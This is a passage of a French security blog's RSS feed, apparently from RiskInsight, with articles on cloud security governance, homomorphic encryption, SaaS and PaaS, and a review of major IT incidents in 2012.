<p>Un certain nombre d’acteurs du Cloud accepteront d’ailleurs de fournir des détails sur le fonctionnement de leur solution, après signature d’un accord de non-divulgation. Des visites de datacenters sont aussi toujours très instructives, et permettent parfois de se forger un avis sur la maturité du niveau de sécurité de l’offre proposée.</p>
<p>Certains fournisseurs sont réticents à fournir des informations très précises préalablement à la signature du contrat, ils peuvent alors proposer l’ajout d’une clause permettant de dénoncer le contrat ultérieurement. Mais attention à ce mécanisme, une fois la mise en œuvre démarrée, faire marche arrière est presque impossible…</p>
<p>Enfin, la possibilité de contrôler le prestataire Cloud est un critère intéressant. Sa capacité à accepter un audit diligenté par ses clients est en effet une preuve de transparence, voire de confiance en son propre niveau de sécurité.</p>
<p><em><sup>1 </sup></em><em>: ANSSI &#8211; Externalisation, Cloud Computing : maîtriser les risques pour les systèmes d&rsquo;information (</em><a href="http://www.ssi.gouv.fr/externalisation/"><em>http://www.ssi.gouv.fr/externalisation/</em></a><em>)  </em></p>
<p><em><sup>2 </sup></em><em>: ENISA  &#8211; Cloud Computing Security Risk Assessment (</em><a href="http://www.enisa.europa.eu/activities/risk-management/"><em>http://www.enisa.europa.eu/activities/risk-management/</em></a><em>) </em></p>
<p><em><sup>3 </sup></em><em>: </em>Cloud Security Alliance <em>&#8211; </em>Cloud Controls Matrix <em>(<a href="https://cloudsecurityalliance.org/research/ccm/">https://cloudsecurityalliance.org/research/ccm/</a>) </em></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/06/cloud-et-securite-mythes-et-realites-partie-1/">Cloud et sécurité : mythes et réalités (partie 1)</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Chiffrement : la clé d’un cloud computing sécurisé ?</title>
		<link>https://www.riskinsight-wavestone.com/2013/05/chiffrement-la-cle-dun-cloud-computing-securise/</link>
		
		<dc:creator><![CDATA[Gérôme Billois]]></dc:creator>
		<pubDate>Fri, 17 May 2013 14:00:45 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[chiffrement]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[PKI]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3747</guid>

					<description><![CDATA[<p>Le Cloud computing pose de nombreuses interrogations sur sa sécurité. Puis-je avoir confiance dans mon fournisseur ? Quels sont les capacités des administrateurs à accéder à mes données ? Est-ce que l’isolation est bien réalisée entre les clients ? Est-ce que les forces...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/05/chiffrement-la-cle-dun-cloud-computing-securise/">Chiffrement : la clé d’un cloud computing sécurisé ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Le Cloud computing pose de nombreuses interrogations sur sa sécurité. Puis-je avoir confiance dans mon fournisseur ? Quels sont les capacités des administrateurs à accéder à mes données ? Est-ce que l’isolation est bien réalisée entre les clients ? Est-ce que les forces de l’ordre d’autre pays peuvent demander un accès à mes données sans que j’en sois informée ? Derrière toutes ces questions se cachent de multiples réponses, variant fortement suivant les services utilisés, les fournisseurs et leur niveau de sécurité, ou encore la localisation des serveurs et le statut juridique des offreurs de service. Il n’existe pas de réponse unique aujourd’hui et même si des certifications, telles que l’ISO 27001 ou encore SSA16/ISAE3402, apportent des niveaux de garanties complémentaires, il est difficile d’avoir une certitude forte sur le niveau de sécurité.</em></p>
<p><span id="more-3747"></span></p>
<h2>Le chiffrement « classique » : une réponse partielle aux inquiétudes</h2>
<p>Dans ce cadre, l’envie de conserver une mainmise sur les données de l’entreprise émerge rapidement, et les technologies de chiffrement font leur retour sur le devant de la scène. L’idée serait de traiter au niveau du cloud des données chiffrées afin de limiter les risques d’écoute. Ceci est possible par exemple pour un service de stockage en ligne. Les données sont chiffrées dans l’entreprise puis envoyées sur le serveur, lors de l’accès elles sont déchiffrées localement par l’utilisateur. Cependant se pose rapidement la question de la capacité à traiter les données, en effet les attentes métiers vis-à-vis du cloud vont bien au-delà d’un simple espace de stockage !</p>
<p>Il est alors possible d’envisager un chiffrement uniquement au moment du stockage chez le fournisseur. Lors d’un traitement interne au service cloud (recherche de données, édition de bulletin de paye, calcul scientifique…) le fournisseur pourrait déchiffrer les données, réaliser le traitement puis chiffrer à nouveau. Cette méthode fonctionne techniquement mais elle ne répond pas aux multiples interrogations. En effet, pour que ce mécanisme fonctionne, le fournisseur doit disposer des clés de chiffrement. Mais qui nous assure alors qu’elles ne sont pas utilisées à mauvais escient ? Et ceci aussi bien par des employés du fournisseur, que des tiers (autorités ou pirates par exemple) qui auraient accès aux systèmes de gestion de clés.</p>
<h2>Une solution à suivre : le chiffrement homomorphique</h2>
<p>Depuis des années, une solution à ce problème mûrit dans la tête des chercheurs : le chiffrement homomorphique. Derrière ce terme complexe se cache une idée simple : pouvoir réaliser des traitements directement sur des données chiffrées, sans avoir besoin de les déchiffrer ! Depuis 2009, de nombreuses avancées ont été réalisées dans ce domaine en particulier au MIT. Récemment, une équipe d’IBM a même mis à disposition une implémentation concrète (code source à l’appui) de cette méthode. Aujourd’hui, il existe encore un grand nombre de limitations, en particulier par rapport à la vitesse de traitement ou les opérations réalisables. Il faudra également que cette méthode et son implémentation soient analysées par des experts en chiffrement pour en garantir la robustesse.  D’autre part, il faudra toujours que l’entreprise fasse l’effort de gérer correctement ses clés de chiffrement. Le quotidien nous montre qu’aujourd’hui c’est encore rarement le cas !</p>
<h2>Une avancée à suivre de près !</h2>
<p>Le chiffrement homomorphique représente une avancée importante dans l’industrialisation de l’informatique. Les annonces récentes ont été largement saluées dans les différentes communautés sécurité. Sa mise en œuvre pourrait lever les nombreux freins qui existent encore aujourd’hui par rapport à la localisation des données ou encore aux fournisseurs. Même s’il faudra encore attendre quelques années avant une possible démocratisation, il s’agit clairement d’un sujet à garder dans le radar de la veille !</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/05/chiffrement-la-cle-dun-cloud-computing-securise/">Chiffrement : la clé d’un cloud computing sécurisé ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>SaaS et sécurité : entreprises, ne mettez pas vos responsabilités dans les nuages !</title>
		<link>https://www.riskinsight-wavestone.com/2013/03/saas-et-securite-entreprises-ne-mettez-pas-vos-responsabilites-dans-les-nuages/</link>
		
		<dc:creator><![CDATA[zephSolucomBO]]></dc:creator>
		<pubDate>Tue, 19 Mar 2013 12:30:42 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[données]]></category>
		<category><![CDATA[gestion des identités]]></category>
		<category><![CDATA[messagerie]]></category>
		<category><![CDATA[SaaS]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3528</guid>

					<description><![CDATA[<p>A l’heure où le SaaS est le mode de Cloud computing le plus représenté au sein des grands comptes, quelques années de recul sur le sujet amènent à un constat clair en termes de sécurité : choisir « le bon » fournisseur SaaS...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/03/saas-et-securite-entreprises-ne-mettez-pas-vos-responsabilites-dans-les-nuages/">SaaS et sécurité : entreprises, ne mettez pas vos responsabilités dans les nuages !</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>A l’heure où le SaaS est le mode de Cloud computing le plus représenté au sein des grands comptes, quelques années de recul sur le sujet amènent à un constat clair en termes de sécurité : choisir « le bon » fournisseur SaaS ne suffit pas.  L’entreprise n’externalise pas sa responsabilité avec sa messagerie…  Elle reste la garante du maintien de son niveau de sécurité dans le temps.</em></p>
<h2>La sécurité, une question négligée après la phase de contractualisation</h2>
<p>Les limites posées par le SaaS sont aujourd’hui bien connues : difficultés d’adaptation du service aux besoins de l’entreprise, absence de possibilités d’audit, questions réglementaires, etc.</p>
<p>Pourtant, de plus en plus de services cloud sont adoptés, sans que la sécurité ne soit nécessairement un frein. Pour cela, une démarche classique d’analyse de risque est menée en évaluant les contraintes légales / réglementaires,  les mécanismes de protection des données, la gestion de la sécurité par le fournisseur, ou encore les conditions de réversibilité de la donnée.</p>
<p>Cette démarche est de plus en plus maîtrisée : de nombreux retours d’expérience et un outillage qui se professionnalise<strong>*</strong> amènent à faire des choix éclairés, en toute connaissance de cause des risques encourus, et donc parfois acceptés.</p>
<p>Malheureusement, la démarche sécurité s’arrête souvent là : à partir du moment où le sujet a été traité lors de la contractualisation, on considère qu’un bon niveau est assuré, puisque l’on a exigé du prestataire de s’en occuper !</p>
<p>Le maintien de la sécurité dans le temps est un enjeu régulièrement oublié, alors même qu’il est en partie du ressort de l’entreprise, et pas seulement à la charge du fournisseur.</p>
<h2>Des sujets à inscrire dans la durée</h2>
<p>Pour s’assurer que la solution cloud est déployée avec le bon niveau de sécurité, et maintenir celui-ci dans le temps, quatre grands thèmes sont à aborder en priorité. S’il s’agit de bonnes pratiques habituelles sur un SI d’entreprise, il faut aujourd’hui les adapter, voire les renforcer pour le SaaS.</p>
<p><figure id="attachment_3529" aria-describedby="caption-attachment-3529" style="width: 424px" class="wp-caption aligncenter"><a href="http://www.solucominsight.fr/2013/03/saas-et-securite-entreprises-ne-mettez-pas-vos-responsabilites-dans-les-nuages/schema-cloud-saas/" rel="attachment wp-att-3529"><img loading="lazy" decoding="async" class=" wp-image-3529" title="schéma cloud saas" src="http://www.solucominsight.fr/wp-content/uploads/2013/03/schéma-cloud-saas.png" alt="" width="424" height="275" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2013/03/schéma-cloud-saas.png 4617w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/03/schéma-cloud-saas-294x191.png 294w, https://www.riskinsight-wavestone.com/wp-content/uploads/2013/03/schéma-cloud-saas-60x39.png 60w" sizes="auto, (max-width: 424px) 100vw, 424px" /></a><figcaption id="caption-attachment-3529" class="wp-caption-text"><span style="font-size: x-small;"><em>Les responsabilités de l’entreprise pour le maintien de la sécurité du SaaS dans le temps</em></span></figcaption></figure></p>
<ul>
<li> La <strong>gouvernance</strong> : les services SaaS doivent être intégrés aux procédures de sécurité et des processus liés au service fourni. Il peut par ailleurs être utile de mener des actions de sensibilisation dans certaines situations.</li>
</ul>
<ul>
<li><strong>L’administration fonctionnelle</strong> du service est bien du ressort de l’entreprise : le fournisseur n’est pas en mesure de faire les choix fonctionnels à votre place (et ce n’est souvent pas ce qu’on lui demande) ! Pour l’aspect sécurité plus encore, c’est à l’entreprise de définir  et mettre en œuvre les fonctionnalités avancées disponibles, de restreindre les services au minimum requis par l’utilisateur, de former ses administrateurs… Ces aspects sont souvent les plus négligés, comme nous le constatons lors des audits que nous réalisons.</li>
<li>Des <strong>contrôles</strong> réguliers peuvent et doivent aussi être mis en œuvre sur les parties auditables des services. Il s’agit en particulier de vérifier que les paramètres de sécurité sont inchangés, d’exploiter les <em>logs</em> sécurité, et de revoir les habilitations. S’il le permet, enfin, ne pas hésiter à auditer son fournisseur (visites de site, voire tests d’intrusion).</li>
<li>Il reste enfin à traiter le sujet de l’<strong>IAM</strong>, enjeu transverse du Cloud, souvent peu ou mal maîtrisé de par sa complexité. Même si cette voie est souvent suivie, il faut pourtant éviter de recréer un compte dans le Cloud pour chaque utilisateur. Pour « synchroniser » les identités de l’entreprise dans le Cloud, il faut également éviter la multiplication des connecteurs  (et notamment ne pas en redévelopper un par fournisseur), sous peine de créer une situation ingérable. Deux approches sont aujourd’hui à prioriser : soit l’utilisation d’un outil de fédération d’identités interne (qui réalise la connexion avec la majorité des fournisseurs de SaaS), soit l’externalisation de l’IAM… dans le Cloud (!) en « Identity as a Service »</li>
</ul>
<h2><strong></strong>Le RSSI, garant de la cohérence des projets</h2>
<p>Dans le cas du SaaS, le rôle des responsables sécurité de l’information est double.</p>
<p>D’une part, il s’agit d’accompagner les projets, en leur apportant des solutions transverses : un certain nombre de points peuvent être mutualisés en amont. C’est tout particulièrement le cas des sujets tels que l’IAM, qui doivent faire l’objet d’une approche unifiée et cohérente &#8211;  et surtout pas projet par projet.  C’est également le cas des questions légales qui doivent faire l’objet d’une réflexion globale amont.</p>
<p>D’autre part, la SSI demeure la garante du niveau de sécurité dans le temps : la Gestion Opérationnelle de la sécurité devra faire l’effort de partir à la conquête des nuages !</p>
<p><strong>*</strong> <em>On peut citer notamment </em><a href="http://www.ssi.gouv.fr/fr/bonnes-pratiques/recommandations-et-guides/securite-de-l-externalisation/externalisation-et-securite-des-systemes-d-information-un-guide-pour-maitriser.html" target="_blank" rel="noopener noreferrer"><em>le guide publié par l’ANSSI</em></a><em> et </em><a href="https://cloudsecurityalliance.org/research/ccm/" target="_blank" rel="noopener noreferrer"><em>la « Cloud Control Matrix » maintenue par la Cloud Security Alliance</em></a></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/03/saas-et-securite-entreprises-ne-mettez-pas-vos-responsabilites-dans-les-nuages/">SaaS et sécurité : entreprises, ne mettez pas vos responsabilités dans les nuages !</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>La Fabric PaaS : cœur de la proposition de valeur du PaaS Privé</title>
		<link>https://www.riskinsight-wavestone.com/2013/01/la-fabric-paas-coeur-de-la-proposition-de-valeur-du-paas-prive/</link>
		
		<dc:creator><![CDATA[zephSolucomBO]]></dc:creator>
		<pubDate>Wed, 30 Jan 2013 17:38:15 +0000</pubDate>
				<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[ActiveState Stackato]]></category>
		<category><![CDATA[applicatif]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[fabric Paas]]></category>
		<category><![CDATA[Jboss]]></category>
		<category><![CDATA[logiciel]]></category>
		<category><![CDATA[PaaS]]></category>
		<category><![CDATA[Platform as a service]]></category>
		<category><![CDATA[Tibco]]></category>
		<category><![CDATA[Tibco Silver]]></category>
		<category><![CDATA[Tomcat]]></category>
		<category><![CDATA[VMware vFabric]]></category>
		<category><![CDATA[Websphere]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3023</guid>

					<description><![CDATA[<p>Avec une croissance de 33% en 2012, le PaaS (Platform as a Service) reste, malgré des indicateurs satisfaisants, le segment le moins développé sur le marché du cloud. À titre de comparaison, il génère 10 fois moins de chiffre d’affaires...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/01/la-fabric-paas-coeur-de-la-proposition-de-valeur-du-paas-prive/">La Fabric PaaS : cœur de la proposition de valeur du PaaS Privé</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Avec une croissance de 33% en 2012, le PaaS (Platform as a Service) reste, malgré des indicateurs satisfaisants, le segment le moins développé sur le marché du cloud. À titre de comparaison, il génère 10 fois moins de chiffre d’affaires que le segment du SaaS.</em></p>
<p><em>D’après Fabrizzio Biscotti, Directeur de recherche chez Gartner « Le PaaS est l&rsquo;endroit où la bataille entre les fournisseurs et les produits s&rsquo;intensifie le plus ». Le marché du PaaS privé n’est pas exclu de cette bataille. Il fait face à une concurrence de plus en plus rude et une  évolution de plus en plus vite.</em></p>
<p><em>Pour mieux comprendre cette évolution, voyons quelle est la proposition des offreurs dans ce marché.</em><strong></strong></p>
<h2>Un positionnement en surcouche des modèles traditionnels</h2>
<p>Traditionnellement, un modèle PaaS offre un environnement complet de développement et d’exécution. Du côté du PaaS privé, les acteurs se positionnent sur le marché des « <em>Fabric</em> <em>PaaS</em> ». Il s’agit d’un outil de provisionnement d’environnements, constitués de composants logiciels et applicatifs packagés au préalable. Cet outil s’appuie ensuite sur les infrastructures existantes de l’entreprise, qu’elles soient physiques, virtuelles ou déjà dans le <em>cloud</em>. Les acteurs de ce marché sont très dynamiques, avec une offre qui évolue rapidement. On y retrouve aujourd’hui les acteurs de l’édition logicielle traditionnelle avec Tibco Silver et VMware vFabric, des acteurs de niche comme ActiveState Stackato et une offre open source avec Cloud Foundry, souche de plusieurs solutions commerciales.</p>
<h2>Agilité, Scalabilité et Consolidation comme crédos</h2>
<p>Les fonctionnalités de packaging intégrées à ces solutions permettent de définir des environnements « clés en main ». Ces environnements contiennent  un ensemble de composants applicatifs, conçus à partir d’une palette d’exécutables tels que Jboss, Websphere, Tomcat, Tibco&#8230; ainsi que d’autres logiciels non standards. Les déploiements sont ainsi standardisés, dans une optique d’optimisation des temps de création des environnements.</p>
<p>Ces outils gèrent également les performances des applications déployées. Ils adaptent ainsi la capacité mise à disposition aux pics et baisses de charge en rajoutant ou supprimant des ressources sur la base d’un jeu de règles prédéfini. Ils offrent également la possibilité de s’étendre vers un <em>cloud</em> public.</p>
<p>Le troisième apport est l’optimisation de l’usage des ressources. Les mêmes ressources pouvant être affectées à des applications de natures différentes, évitant ainsi les modes de fonctionnement en silo.</p>
<h2>Une mise à disposition en 3 étapes</h2>
<p>La mise à disposition des environnements passe généralement par trois étapes clés :</p>
<ul>
<li><em><span style="text-decoration: underline;">Le packaging</span></em> qui permet de concevoir la <em>stack</em>* applicative de l’environnement en définissant les différents composants logiciels nécessaires à l’exécution ;</li>
</ul>
<ul>
<li><em><span style="text-decoration: underline;">Le provisioning</span></em> pour déployer une <em>stack</em> applicative sur une infrastructure à l’aide d’une interface graphique ;</li>
</ul>
<ul>
<li><em><span style="text-decoration: underline;">Le management</span></em><em> pour</em>administrer les <em>stacks</em> déployées, récupérer des statistiques et  définir des règles de scalabilité automatique.</li>
</ul>
<h2>La <em>Fabric</em> <em>PaaS</em> : un outil adapté à vos besoins ?</h2>
<p>Avant toute chose, il est nécessaire de mesurer l’adéquation de l’outil avec le besoin attendu. Comment ? Voici quelques critères qui sauront vous aider à prendre la bonne décision :</p>
<ul>
<li><em><span style="text-decoration: underline;">L’évolutivité des environnements</span></em></li>
</ul>
<p>Si vous êtes dans un contexte soumis à de fortes évolutions d’environnement, une <em>Fabric PaaS</em> permet de réduire le temps de déploiement et de limiter les interventions humaines.</p>
<ul>
<li><em><span style="text-decoration: underline;">Le niveau de demande de création de nouveaux environnements </span></em></li>
</ul>
<p>Une trop faible demande ne permettra pas d’amortir le coût de mise en œuvre par les gains dégagés</p>
<ul>
<li><em><span style="text-decoration: underline;">Le niveau de standardisation des demandes</span></em></li>
</ul>
<p>Plus les demandes sont normalisées / standardisées, plus il sera possible d’aller loin dans le packaging et donc réduire au maximum les interventions humaines</p>
<ul>
<li><em><span style="text-decoration: underline;">La variation dans le temps du niveau d’exigence en performance et haute disponibilité</span></em><span style="text-decoration: underline;">  </span></li>
</ul>
<p>Une <em>Fabric Paas </em>permettra de gérer les capacités de performance au fil de l’eau : assurer le service lorsque le niveau d’exigence est au plus haut tout comme libérer les ressources lorsque le niveau est bas. Plus ce genre de variation sera fréquent, plus l’outil fera preuve d’utilité.</p>
<p>Les promesses des <em>fabric PaaS</em> sont alléchantes. Pour autant il s’agit de produits très récents et demandant des investissements compliqués en période de pressions budgétaires ainsi que des évolutions organisationnelles. Leur avènement nous semble toutefois inéluctable mais à un rythme d’adoption bien plus lent que celui espéré par les fournisseurs.</p>
<p><span style="text-decoration: underline;"> </span></p>
<p>*Stack : Ensemble de composants logiciels permettant de mettre en œuvre un environnement (exemple : un serveur web + un schéma de base de données)</p>
<p>[Article écrit en collaboration avec Alaa Jamal-Bennis]</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/01/la-fabric-paas-coeur-de-la-proposition-de-valeur-du-paas-prive/">La Fabric PaaS : cœur de la proposition de valeur du PaaS Privé</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>La fin du monde a (presque) eu lieu : revue de 5 incidents marquants en 2012</title>
		<link>https://www.riskinsight-wavestone.com/2013/01/la-fin-du-monde-a-presque-eu-lieu-revue-de-5-incidents-marquants-en-2012/</link>
		
		<dc:creator><![CDATA[Mickael Avoledo]]></dc:creator>
		<pubDate>Fri, 18 Jan 2013 14:44:43 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[bug]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[incidents]]></category>
		<category><![CDATA[interruptions]]></category>
		<category><![CDATA[Threat intelligence]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=2943</guid>

					<description><![CDATA[<p>Les plus perspicaces d’entre vous l’auront remarqué : la fin du monde n’a finalement pas eu lieu l’année dernière ! Mais 2012 a porté son lot de catastrophes, bugs, maladresses, black swans et autres interruptions d’activités en tous genres. Sans prétendre à...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/01/la-fin-du-monde-a-presque-eu-lieu-revue-de-5-incidents-marquants-en-2012/">La fin du monde a (presque) eu lieu : revue de 5 incidents marquants en 2012</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Les plus perspicaces d’entre vous l’auront remarqué : la fin du monde n’a finalement pas eu lieu l’année dernière ! Mais 2012 a porté son lot de catastrophes, bugs, maladresses, black swans et autres interruptions d’activités en tous genres. Sans prétendre à l’exhaustivité, nous avons sélectionné quelques incidents parmi les plus significatifs, de par leur nature ou leur impact.</em></p>
<h2>Télécommunications : le réseau mobile Orange down</h2>
<p>Si l’on demandait aux Français quelle panne les a le plus marqués en 2012, il y a fort à parier qu’ils parleraient d’<strong>Orange</strong> : au mois de juillet, l’opérateur (et d’autres par ricochet) a subi une <a title="Pannes logicielles : la zone d’ombre du PRA (Plan de Reprise d’Activité)" href="http://www.solucominsight.fr/2012/08/pannes-logicielles-la-zone-dombre-du-pra-plan-de-reprise-dactivite/">interruption de son réseau mobile</a> pendant plusieurs heures suite à un incident logiciel. Moins d’une semaine plus tard, c’était au tour d’O<sub>2</sub> de subir le même sort au Royaume-Uni pour quasiment 24h. Preuve, s’il en fallait une, que l’on ne doit pas considérer la résilience des réseaux mobiles comme une évidence.</p>
<h2><span id="more-2943"></span></h2>
<h2>Énergie : la plus grosse panne électrique de l’histoire</h2>
<p>Il en va de même pour les réseaux électriques. Si la dernière panne générale en France remonte à 1978, des interruptions significatives ont été enregistrées récemment (Chili et Japon en 2011, USA en 2008 et 2003). Fin juillet 2012, l’Inde a établi un triste record : la plus grande panne d’électricité jamais enregistrée, avec 670 millions d’usagers touchés pendant plusieurs jours. En cause : une capacité de production qui a du mal à suivre la croissance de la population et de la demande, combinée à une sècheresse qui a diminué la production hydro-électrique du pays.</p>
<h2>Banque et finance : un des bugs les plus coûteux après le blackout aux USA de 2003 et la destruction d’Ariane 5 en 1996</h2>
<p>Les pannes et bugs logiciels occupent une bonne place cette année dans le top des causes des incidents majeurs. C’est ce qui s’est passé pour Knight Capital, qui a subi en août l’un des bugs les plus chers de l’histoire : 440 millions de dollars envolés. Un système de trading haute fréquence mal qualifié est à l’origine du désastre, qui ne manquera pas d’alimenter les détracteurs de la finance. Knight Capital est d’ailleurs passé proche de la banqueroute et n’a pu éviter le rachat par un de ses concurrents début 2013.</p>
<p>Dans le secteur bancaire, impossible de passer sur la panne informatique de Royal Bank of Scotland (RBS). Provoquée par une erreur dans un batch, elle a exigé d’importantes et nombreuses opérations manuelles des équipes informatiques ce qui a fortement retardé le traitement. Plus de 15 millions de clients ne pouvaient plus retirer de l’argent ou faire des virements pendant une semaine ! Résultat : 219 millions d’euros de dédommagements pour la banque.</p>
<h2>Services informatiques : le cloud, toujours le cloud !</h2>
<p>Les belles promesses de<a title="Panne Facebook : symptomatique de la résilience du cloud computing ?" href="http://www.solucominsight.fr/2012/03/panne-facebook-symptomatique-de-la-resilience-du-cloud-computing/"> résilience de l’informatique dans les nuages</a> avaient déjà pris un sacré coup en 2011, avec des interruptions importantes chez la plupart des acteurs majeurs du secteur. L’année 2012 a fini de tuer le rêve.</p>
<p>Amazon est le grand vainqueur avec au moins 4 pannes majeures en 2012, dont une le jour de Noël. Les causes sont diverses : tempête et panne électrique, bug logiciel, erreurs réseau ou erreur humaine. Chez Microsoft, la panne mondiale d’Azure en février a viré au tragicomique lorsqu’il fut révélé qu’elle provenait d’une erreur logicielle liée à l’année bissextile ! Enfin, bien que moins importantes, Google a aussi connu son lot de pannes en 2012, tout comme <a title="Panne Facebook : symptomatique de la résilience du cloud computing ?" href="http://www.solucominsight.fr/2012/03/panne-facebook-symptomatique-de-la-resilience-du-cloud-computing/">Facebook </a>et Twitter.</p>
<h2>Catastrophes naturelles : l’ouragan Sandy … entre autres</h2>
<p>Impossible de terminer ce panorama sans évoquer les catastrophes naturelles : inondations aux Philippines, séisme en Iran et en Chine, <a title="Les plans de continuité informatique des cloud à l’épreuve de l’ouragan Sandy" href="http://www.solucominsight.fr/2012/12/les-plans-de-continuite-informatique-des-cloud-a-lepreuve-de-louragan-sandy/">ouragan Sandy en Amérique du Nord</a>… Selon le réassureur allemand Munich Re, les catastrophes naturelles ont causé environ 160 milliards de dollars de pertes en 2012 (400 en 2011 selon la même source, année la plus coûteuse de l’histoire en la matière), sans parler des nombreuses victimes.</p>
<h2>Et en bonus…</h2>
<p>Moins importants en termes d’impacts que ceux mentionnés ci-dessus, deux exemples d’incidents nous semblent pourtant pouvoir donner matière à réflexion.</p>
<p>En cette année d’élections en France où une nouvelle fois la question du vote électronique a été posée,  deux incidents informatiques ont perturbé des processus électoraux : dans le canton de Vaud en Suisse et lors des primaires du Likoud en Israël.</p>
<p>Pour clore ce panorama, on se doit de citer les actes malveillants, liés à la cybercriminalité notamment, par exemple les importantes attaques DDoS contre des institutions financières aux USA ou l’infection de 30000 PC de Saudi Aramco (première compagnie pétrolière mondiale) par le virus très perfectionné Shamoon. On notera également les révélations du New York Times concernant l’implication des USA et d’Israël dans le virus <a title="Apparition de Flame et révélation sur Stuxnet, quelles conséquences pour la sécurité de l’information ?" href="http://www.solucominsight.fr/2012/06/apparition-de-flame-et-revelation-sur-stuxnet-quelles-consequences-pour-la-securite-de-l%e2%80%99information/">Stuxnet </a>en 2010, faisant encore monter d’un cran la pression sur la cyber-guerre.</p>
<h2>Les années passent, les interruptions d’activité restent</h2>
<p>Les années se suivent et ne se ressemblent pas<sup>1</sup>, mais les interruptions d’activité, catastrophes et autres bugs informatiques continuent de provoquer des problèmes majeurs.</p>
<p>S’il est important de mettre des moyens sur leur prévention, il est tout aussi nécessaire de savoir réagir. Le risque zéro n’existe pas et certains accidents sont aussi inattendus qu’inévitables. Dans ce cas,  un PCA accompagné d’une gestion de crise efficace peuvent permettre de limiter grandement les dégâts !</p>
<p>[Article écrit en collaboration avec Gérôme Billois]</p>
<p><sup>1</sup>Voir notre <a href="http://www.solucominsight.fr/2012/01/2011-retrospective-des-incidents-majeurs-et-impacts-sur-la-gestion-de-risques/">rétrospective des incidents 2011</a>.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/01/la-fin-du-monde-a-presque-eu-lieu-revue-de-5-incidents-marquants-en-2012/">La fin du monde a (presque) eu lieu : revue de 5 incidents marquants en 2012</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Les plans de continuité informatique des cloud à l’épreuve de l’ouragan Sandy</title>
		<link>https://www.riskinsight-wavestone.com/2012/12/les-plans-de-continuite-informatique-des-cloud-a-lepreuve-de-louragan-sandy/</link>
		
		<dc:creator><![CDATA[Yannick Neff]]></dc:creator>
		<pubDate>Fri, 28 Dec 2012 08:30:49 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Métiers - Stratégie & projets IT]]></category>
		<category><![CDATA[Cloud]]></category>
		<category><![CDATA[Cloud security]]></category>
		<category><![CDATA[datacenter]]></category>
		<category><![CDATA[PCI]]></category>
		<category><![CDATA[RaaS]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=2778</guid>

					<description><![CDATA[<p>Quand l’ouragan « Katrina » a frappé la Côte du Golf des États-Unis, en Août 2005, ravageant une bonne partie de l’infrastructure de télécommunications, seule une poignée de datacenters a pu tenir le choc. « Katrina » n’a pas seulement anéanti ces centres de...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/12/les-plans-de-continuite-informatique-des-cloud-a-lepreuve-de-louragan-sandy/">Les plans de continuité informatique des cloud à l’épreuve de l’ouragan Sandy</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Quand l’ouragan « Katrina » a frappé la </em><em>Côte du Golf des États-Unis, en Août 2005, ravageant une bonne partie de l’infrastructure de télécommunications, seule une poignée de datacenters a pu tenir le choc. « Katrina » n’a pas seulement anéanti ces centres de données, mais a également mis en défaut un nombre important de plans de continuité informatique (PCI).</em></p>
